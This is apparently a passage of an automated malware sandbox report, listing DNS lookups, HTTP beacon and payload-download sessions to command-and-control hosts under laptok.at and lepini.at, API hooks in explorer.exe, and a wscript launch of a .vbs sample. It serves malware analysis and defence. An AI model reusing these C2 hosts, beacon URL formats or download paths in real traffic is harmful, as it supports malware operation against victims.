Nov 20, 2020 13:34:45.133925915 CET   192.168.2.3   8.8.8.8   0x8588    Standard query (0)  api3.lepini.at         A (IP address)   IN (0x0001)
Nov 20, 2020 13:34:46.772273064 CET   192.168.2.3   8.8.8.8   0x1c76    Standard query (0)  api3.lepini.at         A (IP address)   IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
--------- | --------- | ------- | -------- | ---------- | ---- | ----- | ------- | ---- | -----
Nov 20, 2020 13:33:44.715097904 CET | 8.8.8.8 | 192.168.2.3 | 0xbdb4 | No error (0) | api10.laptok.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 20, 2020 13:33:48.929748058 CET | 8.8.8.8 | 192.168.2.3 | 0xe1a7 | No error (0) | api10.laptok.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 20, 2020 13:33:55.162821054 CET | 8.8.8.8 | 192.168.2.3 | 0x3d08 | No error (0) | api10.laptok.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 20, 2020 13:34:41.933887005 CET | 8.8.8.8 | 192.168.2.3 | 0xd102 | No error (0) | c56.lepini.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 20, 2020 13:34:44.703452110 CET | 8.8.8.8 | 192.168.2.3 | 0x7ce6 | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001)
Nov 20, 2020 13:34:45.169461012 CET | 8.8.8.8 | 192.168.2.3 | 0x8588 | No error (0) | api3.lepini.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 20, 2020 13:34:46.810003996 CET | 8.8.8.8 | 192.168.2.3 | 0x1c76 | No error (0) | api3.lepini.at | | 47.241.19.44 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• api10.laptok.at
• c56.lepini.at
• api3.lepini.at

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
---------- | --------- | ----------- | -------------- | ---------------- | -------
0 | 192.168.2.3 | 49731 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
--------- | ------------------ | --------- | ----
Nov 20, 2020 13:33:44.982534885 CET | 240 | OUT | GET /api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 20, 2020 13:33:45.971455097 CET | 242 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2020 12:33:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 6e ec 40 10 45 3f c8 0b 33 2d cd cc ec 9d 71 cc cc 5f ff f2 a4 28 8a 94 4c c6 ee ae aa 7b 8e a7 73 8e 1f 25 9c 00 53 49 e5 26 0d 27 5f 16 a3 50 98 10 60 e6 36 9e 39 15 17 5d 05 6b 9d 70 5f 59 26 3e 2a 8a 9e ba b2 f1 6f 1f 14 7a 72 d4 f6 71 67 86 8d aa 37 b1 1a c0 b9 c6 3c f7 e7 df 9c d3 c5 0a a2 d9 2b 76 b5 f0 db a8 76 0d ad 2e db ba ca 83 d1 5f d6 a7 de c0 e2 7d e2 cf 8f 7b 0e 40 a1 15 12 ce cf 9a cb 89 4b 9b e1 ca 6c fa 31 58 ac 4e f9 e8 7e 8c c1 7e fc 98 7e 57 8b c3 b4 a8 2f 45 a9 9b aa 2f b1 46 c9 c6 e4 56 b5 30 ee cd a8 9f f9 a0 c3 3a 34 ed 8e fd 0e d5 7e 78 7b d1 aa 1e a6 19 d3 c4 4f d0 01 76 df 2a e6 74 d5 d1 ad d6 94 38 c5 b5 a2 6d 8c 99 c3 35 2b e4 cd 3a c0 7e 76 e7 2d 08 c4 e3 ac 58 ff 5d b4 12 72 a2 b3 00 0a 7d 9c 26 b5 52 2b d9 28 2a 21 2e 6c 61 5e e7 e1 a0 5a 4c 50 04 2a 3b 8d 76 2d 71 cf 6e d5 62 58 85 08 89 c9 71 71 b4 5f 80 b7 e8 01 25 b1 8c 61 e8 d7 e0 d9 2d e7 3d 2a 94 ac 7a 9c c3 74 98 1a 1f 06 99 2c a2 de 51 e4 32 85 50 db d9 80 0e cc 22 c8 84 25 8e 2f a7 9e 95 61 3d 3f 1a a0 ec 44 9c ab 95 fe 70 db 4f 60 73 d0 89 32 9d f0 42 4a 66 17 be 70 04 7b 2b 12 de fa a6 8e 1f 29 c6 37 87 4f a3 88 4b 62 b4 87 ad e5 bf 1b 34 6f 62 55 32 65 ba 37 d5 01 37 4b 11 b6 54 e2 7b ff 78 35 69 bb 98 3e 93 d7 1f 49 68 0d cb b4 0e ca 9a 13 20 c3 53 80 90 3c b4 58 a0 c6 e0 94 ea 01 30 64 70 9a 95 a0 b0 18 3d 34 c7 c8 85 9c 6d fc 74 e5 ee d4 43 91 bf 76 15 d8 62 4e 6e f1 de 42 fd 88 58 3d b3 8c c6 87 e3 97 58 5a 2e 3d 59 99 3a b4 52 8b 66 b8 79 c2 fd b8 6b d2 b3 69 31 49 27 22 1c 4b b4 70 b0 b6 83 75 a2 ab 56 0c 7e f0 50 0d 5f 67 e2 f6 70 5e 42 14 22 32 01 dd 2b 44 a8 93 3a 50 78 29 46 3c 5b 17 7e 77 81 bb 47 a1 64 12 7e fe a1 c0 77 56 21 48 fc f5 c8 2d b8 d3 9c 4b 57 a0 ab 0d 0f 8b 66 fe 0e 3f 9f 7b 65 3a e0 3c 84 5b 41 33 f8 04 c6 95 3d 2b e5 a6 84 25 ef f9 e5 cb 
41 54 98 dc 90 d9 fe 96 d5 10 41 4d 8d f1 bb 55 f1 75 a6 1f e7 3c 56 e3 06 fc 04 e5 d8 f4 6c b1 fb 21 dd cf f1 8e 99 79 78 ac f5 97 b9 03 2d 8c d9 76 0c bd 6b 74 5e 91 30 04 73 a4 1e 5b 78 bf 8f 67 9e 5f 7a bc fe 86 f6 8e a3 ee c5 85 ad 3f af 6b 42 3e a2 fa c8 22 88 67 a4 4e 10 95 49 cf 03 f5 b8 41 d9 ed 75 dd ea 98 05 3d 2d aa 43 8b be d0 f5 63 a6 aa fc 96 cf ba 60 02 fb 8a 92 16 72 cb e0 cc 2b 7d 33 02 bb 66 0b 54 2a 60 4c cd c3 9a a0 cd ea 94 92 79 76 71 51 ea 42 30 30 d5 31 3e 87 78 c1 45 26 75 04 32 d9 17 14 f6 26 08 e3 a5 e1 3e f9 c1 71 43 04 c3 a5 a5 79 3b 75 76 75 a4 29 f7 cc 98 be d1 c4 3b a1 6d 9b 88 9f 38 d3 96 d6 78 75 06 60 1f 86 57 3d 21 64 6c c0 e6 c0 da c3 1e c5 a1 c6 a9 74 bb d3 02 48 e5 bc 88 b8 98 09 5a 3b 80 59 83 8b 32 24 72 b7 21 d6 49 e2 0c 35 75 8e 2a 15 0f 8d 65 92 f6 8d 57 2c 46 98 42 6e 78 69 62 23 86 8a ee eb 25 a3 13 89 e7 f8 36 a3 65 ae 25 25 68 97 ce ec 5f f5 e0 a7 95 89 68 73 b8 a2 0c 68 26 e2 f3 33 a2 7d 45 04 97 d7 48 6c 1b 4b 0d b9 89 2f 83 78 11 6d 47 c4 27 46 bd f6 ef 3a 1d 79 bf 46 6b 7c fa 7e 57 84 53 f9 05 90 77 2f 10 66 c8 e8 22 35 69 b8 e3 b2 9e 49 58 81 dd e1 9d aa 6b 39 bf 63 e5 d0 7b 42 fb db e2 49 97 47 8e b6 d8 cb b7 a2 f9 e8 4a 18 75 2c 03 70 25 8b f7 bb 2a cc 91 79 7d 3e 63 87 97 12 ab 78 ba
                                                                                                                                            Data Ascii: 2000n@E?3-q_(L{s%SI&'_P`69]kp_Y&>*ozrqg7<+vv._}{@Kl1XN~~~W/E/FV0:4~x{Ov*t8m5+:~v-X]r}&R+(*!.la^ZLP*;v-qnbXqq_%a-=*zt,Q2P"%/a=?DpO`s2BJfp{+)7OKb4obU2e77KT{x5i>Ih S<X0dp=4mtCvbNnBX=XZ.=Y:Rfyki1I'"KpuV~P_gp^B"2+D:Px)F<[~wGd~wV!H-KWf?{e:<[A3=+%ATAMUu<Vl!yx-vkt^0s[xg_z?kB>"gNIAu=-Cc`r+}3fT*`LyvqQB001>xE&u2&>qCy;uvu);m8xu`W=!dltHZ;Y2$r!I5u*eW,FBnxib#%6e%%h_hsh&3}EHlK/xmG'F:yFk|~WSw/f"5iIXk9c{BIGJu,p%*y}>cx


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
---------- | --------- | ----------- | -------------- | ---------------- | -------
1 | 192.168.2.3 | 49732 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
--------- | ------------------ | --------- | ----
Nov 20, 2020 13:33:47.086637974 CET | 455 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive
Nov 20, 2020 13:33:47.847647905 CET | 455 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 20 Nov 2020 12:33:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
---------- | --------- | ----------- | -------------- | ---------------- | -------
2 | 192.168.2.3 | 49735 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
--------- | ------------------ | --------- | ----
Nov 20, 2020 13:33:49.214777946 CET | 469 | OUT | GET /api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 20, 2020 13:33:51.999758005 CET | 471 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2020 12:33:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 83 40 14 44 17 c4 00 b7 21 ee 10 5c 66 10 dc dd 56 ff f3 4f e6 a1 a1 5f 57 dd 4b d2 dc 00 f6 4e f3 e3 e2 49 06 3f b5 1d 73 97 c5 05 11 f5 cd 87 bb 67 9f 88 a3 fc e7 2e 6c 0d 7a df 51 ed f9 40 a3 ad bb a7 9c 05 16 21 fc dc b4 49 71 8a 80 f6 13 4b 77 ef 04 6e 4f 99 1f b9 60 c3 2a 0f 8f 0d e8 13 83 7e 35 82 02 66 53 fd 49 32 d9 11 d9 a6 48 c3 f4 e6 d1 74 82 2f 36 3e e9 c1 a5 7f 1c 55 6d 9d d4 d9 a8 0b 8a 33 48 07 45 a3 5d 17 8e 61 6c 54 96 9d c9 51 4b 61 09 b6 e1 c1 59 27 ae 33 55 f7 a4 5e 6c 64 46 b0 89 21 4a fb a1 ef ae 7e 87 03 5a 16 85 e4 90 40 0b d5 a3 68 63 3a b3 a5 f3 ca bf 78 61 b6 f4 7a f4 6e 67 86 c0 e8 83 66 ca bd e1 d5 a3 05 75 f0 89 e7 ba 2e 87 15 ce d5 b5 d3 ee 89 4e 69 f0 8b 37 59 d5 b7 67 aa 80 52 9e 84 ed b5 2c 95 be d6 a9 3d 8d 3c 0a 4e 34 53 87 c6 81 dc 09 fa fc ae 01 51 45 36 7d 1c c5 8e 5a fa b5 9a af 03 36 33 f1 d9 f9 60 fa 5e 7c 77 35 03 07 30 9c 8a 1f 53 26 4e 73 9b 22 8f 85 7e 83 a2 11 91 5b 75 5f f9 3e bf df 4b 51 68 21 11 85 3a 9c 85 f4 cc 3e 37 c8 63 49 54 91 f1 9e 09 19 3f 45 70 10 ae 4f 84 95 cc f7 a6 03 32 71 54 d4 5f cf 88 81 64 4c 79 b9 b3 9c 98 b3 8e 0a fa 3a 88 aa bc f5 30 4a 63 88 c3 c8 d2 59 bf b7 da 8a 3d ae aa 0e e4 1b 6f 86 66 8b 40 28 c8 22 40 bb 08 c9 90 9f 00 c1 4a 00 c5 f6 19 c4 4c 7f 5b 61 e5 fb bc d6 28 7d ad 84 dd 42 1e f4 72 29 84 d7 da 67 0e 06 99 a0 8c 58 28 f2 1d 56 e0 67 db 4c e6 4d 93 6c ec cf 55 d9 80 15 da 5a ce f2 b5 f5 ad ed fe 0a 0f e5 93 e9 e4 a4 02 41 e1 e0 45 2f 3f 4f 3d 3a 22 b3 3d 83 76 50 b1 61 a9 bc d0 2c e5 52 fa db b4 55 01 68 09 03 d0 b1 db ee 92 3d 35 01 56 6f e5 1f 82 e4 75 df f4 5b 2e 91 e4 46 82 a3 bc bc 97 eb 21 ed e2 e3 f5 32 fe 6a e5 70 93 f5 f1 5d c1 8b e7 e2 3a 3c 69 41 d2 e7 67 ff a2 ea 8e 50 bb ae 2d 51 bd c6 e2 a8 8c 2d 6b 51 d8 4d 25 b6 70 a4 69 0b da 1f bf 5e 92 2c 3f 7a 65 48 4b 
50 ed c4 ad 37 6f 6b 55 6b ca cc 03 02 34 4c 7c 9c a4 19 fa 14 f3 70 ac 64 9f 0f f9 cb 19 40 f8 e9 b4 90 16 ce 9e 61 9b 61 54 f9 38 db 21 bb ec 5c 2d 67 be 72 c6 e5 df 3a d4 c3 a0 e6 d7 c3 60 46 58 62 65 d2 b9 d1 ee f5 63 f6 40 2b 0d e1 04 65 59 c8 11 10 d4 63 a1 e3 17 eb 40 5a 61 22 a6 99 72 8f b4 02 b7 b2 ee ef 8c 62 dc c7 df 86 2e a3 9c 73 f9 1e 54 5e 8e 79 60 e5 8c c3 fb 3b fc 44 19 52 b3 d5 5e c4 eb fd c5 dc e3 98 70 fa b2 8c 4f 11 8b 47 e1 cd 77 73 aa f6 a5 5d cc f1 9b 00 40 c1 5f 0c ca 53 2d c8 89 15 6b 2e 06 0a 85 bb 6f 78 25 d3 ca 2e 64 01 50 11 96 4b b1 2e 36 8e 69 68 23 41 1f c2 26 2a 8a ac c3 e5 32 0c 91 b1 15 ff 2d 8f 98 19 df 83 72 ed 15 30 a9 9d 78 ae 4e f4 ea 26 75 0b 85 4b 44 0b 66 9f 33 52 dc 27 59 05 31 4d a7 e3 be 45 9d 1b 06 e5 64 a5 a4 02 86 55 9a 62 f4 95 26 bc 4d 20 3c e4 8f 0a dc f3 08 32 5d 17 b0 ee 22 73 c4 88 03 0e 21 17 8a 54 fa 90 ee 6a ba 1b 99 8e 89 65 20 05 96 d8 0d d6 a7 06 b6 88 a0 aa b2 6f ef 32 c4 b9 d9 31 ce ad f0 91 64 1d 56 a7 13 e8 ad 6b bf 7e 5b 69 13 ef d1 c8 b8 ab 95 1d d2 25 2c e8 b4 ca ac 93 c3 84 02 72 65 f0 01 5a 34 2a 09 f1 f5 40 d9 a0 81 1d b6 02 ab 97 0c da 33 5e 5a a1 22 7c 33 18 fc 50 05 45 93 2c 26 99 06 7f 2e c7 80 6e ad 23 20 af 51 3e 5b ca 79 aa 99 af af 9d dd 9c 88 4b 31 82 e6 d0 d6
                                                                                                                                            Data Ascii: 2000E@D!\fVO_WKNI?sg.lzQ@!IqKwnO`*~5fSI2Ht/6>Um3HE]alTQKaY'3U^ldF!J~Z@hc:xazngfu.Ni7YgR,=<N4SQE6}Z63`^|w50S&Ns"~[u_>KQh!:>7cIT?EpO2qT_dLy:0JcY=of@("@JL[a(}Br)gX(VgLMlUZAE/?O=:"=vPa,RUh=5Vou[.F!2jp]:<iAgP-Q-kQM%pi^,?zeHKP7okUk4L|pd@aaT8!\-gr:`FXbec@+eYc@Za"rb.sT^y`;DR^pOGws]@_S-k.ox%.dPK.6ih#A&*2-r0xN&uKDf3R'Y1MEdUb&M <2]"s!Tje o21dVk~[i%,reZ4*@3^Z"|3PE,&.n# Q>[yK1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
---------- | --------- | ----------- | -------------- | ---------------- | -------
3 | 192.168.2.3 | 49734 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
--------- | ------------------ | --------- | ----
Nov 20, 2020 13:33:53.131330967 CET | 749 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive
Nov 20, 2020 13:33:53.895561934 CET | 755 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 20 Nov 2020 12:33:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
---------- | --------- | ----------- | -------------- | ---------------- | -------
4 | 192.168.2.3 | 49738 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
--------- | ------------------ | --------- | ----
Nov 20, 2020 13:33:55.434617043 CET | 756 | OUT | GET /api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 20, 2020 13:33:56.368752956 CET | 758 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2020 12:33:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID: 5
Source IP: 192.168.2.3
Source Port: 49750
Destination IP: 47.241.19.44
Destination Port: 80
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Nov 20, 2020 13:34:42.705324888 CET
kBytes transferred: 4623
Direction: OUT
Data: GET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Host: c56.lepini.at
Timestamp: Nov 20, 2020 13:34:43.357661009 CET
kBytes transferred: 4624
Direction: IN
Data: HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:34:43 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 138820
                                                                                                                                            Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                            Connection: close
                                                                                                                                            ETag: "5db6b84e-21e44"
                                                                                                                                            Accept-Ranges: bytes


Session ID: 6
Source IP: 192.168.2.3
Source Port: 49751
Destination IP: 47.241.19.44
Destination Port: 80
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Nov 20, 2020 13:34:45.442919970 CET
kBytes transferred: 4774
Direction: OUT
Data: GET /api1/4hPW9kKqFHoPCbkici7/axeaBmAwInlm_2BMwjoNQF/DBqPIV6fxiDUx/O8IYQJ_2/FHfs18Nkn9y513u4F9SUOJw/kNmy8dvo70/7jCyOgfNyGln8LENF/ErRL2pQStqN1/9Qq_2BuUJKP/_2Fjcn_2BotOm5/cEi3nGid_2FTEjNr_2B_2/FztACtnep14lNaww/g259IbS6qj0nWTz/Gh1DisQwgNRag12JVP/NBztCoN0H/TGOsfxOOicoc9Giue0bG/lBoyH_2B2mbkCnKCsUn/FC1_0A_0D28OMwhi9pqja2/n506RnxvrVDkJ/nlxG9FcdJ_/2Btn0wAIu/7J2m HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                            Host: api3.lepini.at
Timestamp: Nov 20, 2020 13:34:46.738014936 CET
kBytes transferred: 4785
Direction: IN
Data: HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:34:46 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.3
Source Port: 49754
Destination IP: 47.241.19.44
Destination Port: 80
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Nov 20, 2020 13:34:47.078074932 CET
kBytes transferred: 4786
Direction: OUT
Data: POST /api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2FvJp2IQ4IZi8SCWS/gz5OHLXug/fyQYX3fieMX_2FjcAjW8/hzShghlLicWrj3lQfLt/rhQSYVCKzEiMW_2FO85OZQ/XR6_2BLXNmR15/9Qh_2F4q/grWd_2FFp65v_2FIzQ3F6ge/ak2ymGZicE/UE_2FuPPw8_2BZGEv/QsAL_2Bz08MJ/CIkIoxpdM5N/NWEb4k99CP_2B5/mG4eGNV4kLLjNZpk_0A_0/DnyTv6YNSCi2606v/WegLk1STDZJMFeZ/ibnQp1hQgDMJwqC/jc HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                            Content-Length: 2
                                                                                                                                            Host: api3.lepini.at
Timestamp: Nov 20, 2020 13:34:48.278784990 CET
kBytes transferred: 4786
Direction: IN
Data: HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:34:48 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Data Raw: 38 32 0d 0a df 40 11 17 17 4b 90 6a ee 3c 5f 4c 14 08 16 66 92 e8 32 90 a4 05 26 29 0e 77 57 e4 2a 8e 4e 22 c1 43 0e 08 9c 51 bd 96 40 04 87 99 1f 91 3d d4 e0 da c9 22 24 ed 92 50 6c 7b 9b 9c f8 34 fe c0 24 33 33 c0 d6 b1 2c 30 38 a2 b5 19 70 62 93 a5 8e 81 0f 3a 04 e8 07 25 12 cf a2 53 9b 89 0f c3 81 ef a2 87 2f 27 e2 93 f1 02 67 36 d4 02 74 ed a4 30 0e 73 60 a6 38 52 7b f7 ba a4 48 6a 99 e0 4b f7 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 82@Kj<_Lf2&)wW*N"CQ@="$Pl{4$33,08pb:%S/'g6t0s`8R{HjK0


                                                                                                                                            Code Manipulations

                                                                                                                                            User Modules

                                                                                                                                            Hook Summary

Function Name                                                Hook Type   Active in Processes
CreateProcessAsUserW                                         EAT         explorer.exe
CreateProcessAsUserW                                         INLINE      explorer.exe
CreateProcessW                                               EAT         explorer.exe
CreateProcessW                                               INLINE      explorer.exe
CreateProcessA                                               EAT         explorer.exe
CreateProcessA                                               INLINE      explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW     IAT         explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW             IAT         explorer.exe

                                                                                                                                            Processes

Process: explorer.exe, Module: KERNEL32.DLL
Function Name                                                Hook Type   New Data
CreateProcessAsUserW                                         EAT         7FFB70FF521C
CreateProcessAsUserW                                         INLINE      0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW                                               EAT         7FFB70FF5200
CreateProcessW                                               INLINE      0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA                                               EAT         7FFB70FF520E
CreateProcessA                                               INLINE      0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll
Function Name                                                Hook Type   New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW     IAT         7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW             IAT         6105020

Process: explorer.exe, Module: WININET.dll
Function Name                                                Hook Type   New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW     IAT         7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW             IAT         6105020

                                                                                                                                            Statistics

                                                                                                                                            Behavior


                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:13:33:16
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
                                                                                                                                            Imagebase:0x7ff6daeb0000
                                                                                                                                            File size:163840 bytes
                                                                                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                                            Has elevated privileges:true
